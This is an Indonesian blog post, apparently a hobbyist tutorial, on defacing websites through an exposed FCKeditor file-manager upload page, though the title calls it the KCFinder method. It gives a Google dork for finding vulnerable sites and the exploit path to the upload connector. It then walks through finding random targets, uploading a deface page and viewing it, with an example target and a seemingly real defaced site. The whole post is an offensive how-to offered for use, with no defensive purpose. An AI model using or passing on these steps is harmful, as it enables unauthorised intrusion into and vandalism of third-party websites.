Tutorial Deface Menggunakan Metode KCFinder [Lengkap]

Oke disini saya ingin membagikan pengalaman saya..
Disini saya cuma ingin membagikan pengalaman saya karena disini saya bukan Mastah.



Siapkan Dork Dibawah Ini:

-          inurl:advert_detail.php?id=

exploitnya :
-           /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

1. Berdoa
Sebelumnya anda harus berdoa sebelum mengerjakan apapun termasuk ingin mendeface :v

2. Menyiapkan Script
Siapkan script anda atau bisa juga Cara Membuat Script Sederhana Jika sudah dicopas silahkan di salin di notepad anda masing masing

3. Mencari Target
Search di google maupun lainnya dengan menyalin dork diatas. cari Website Yang Ingin anda Deface

4. Memasukkan Exploitnya
Jika sudah menemukan target yang akan dideface silahkan di tambahin exploitnya
contih:
 - http//www.co.li//admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php 

5.Memasukkan file/script
Memasukkan file atau script yang sudah jadi ke halaman yang terdapat tulisan upload file..

6. Melihat Hasil Deface tersebut

Tinggal menambahkan kata (files) dibelakang url tersebut
contoh:
- http://www.bozyaziemlak.com/files/rct.html

0 Response to "Tutorial Deface Menggunakan Metode KCFinder [Lengkap]"

Post a Comment

Berkomentarlah dengan bijak & sopan :)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel